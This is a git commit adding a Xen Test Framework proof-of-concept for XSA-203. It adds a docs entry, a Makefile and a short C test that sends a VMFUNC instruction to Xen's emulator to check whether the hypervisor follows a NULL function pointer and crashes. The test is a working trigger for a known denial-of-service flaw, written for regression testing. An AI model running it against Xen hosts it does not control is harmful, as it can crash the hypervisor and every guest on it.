XSA-203 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 1feccb41ce213a4d17a84c82c12f44f96f95f73b..d88a874ed71760ca07befca769699d30b733ca7a 100644 (file)
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -80,6 +80,8 @@ address checks.
 @subpage test-xsa-200 - x86: CMPXCHG8B emulation fails to ignore operand size
 override.
 
+@subpage test-xsa-203 - x86: missing NULL pointer check in VMFUNC emulation.
+
 
 @section index-utility Utilities
 

diff --git a/tests/xsa-203/Makefile b/tests/xsa-203/Makefile
new file mode 100644 (file)
index 0000000..c6fb856
--- /dev/null
+++ b/tests/xsa-203/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-203
+CATEGORY  := xsa
+TEST-ENVS := hvm32
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk

diff --git a/tests/xsa-203/main.c b/tests/xsa-203/main.c
new file mode 100644 (file)
index 0000000..01b5bca
--- /dev/null
+++ b/tests/xsa-203/main.c
@@ -0,0 +1,41 @@
+/**
+ * @file tests/xsa-203/main.c
+ * @ref test-xsa-203
+ *
+ * @page test-xsa-203 XSA-203
+ *
+ * Advisory: [XSA-203](http://xenbits.xen.org/xsa/advisory-203.html)
+ *
+ * Versions of Xen between 4.6 (when VMFUNC support was introduced) and
+ * XSA-203, would follow a NULL function pointer on non-Intel hardware.
+ *
+ * Poke a VMFUNC at the instruction emulator, and see whether Xen falls over.
+ *
+ * @see tests/xsa-203/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-203 PoC";
+
+bool test_needs_fep = true;
+
+void test_main(void)
+{
+    asm volatile (_ASM_XEN_FEP
+                  "1: vmfunc; 2:"
+                  _ASM_EXTABLE(1b, 2b) /* Ignore #UD on older versions. */
+                  :: "a" (0));
+
+    /* If Xen is alive, it didn't fall over the NULL function pointer. */
+    xtf_success("Success: Not vulnerable to XSA-203\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */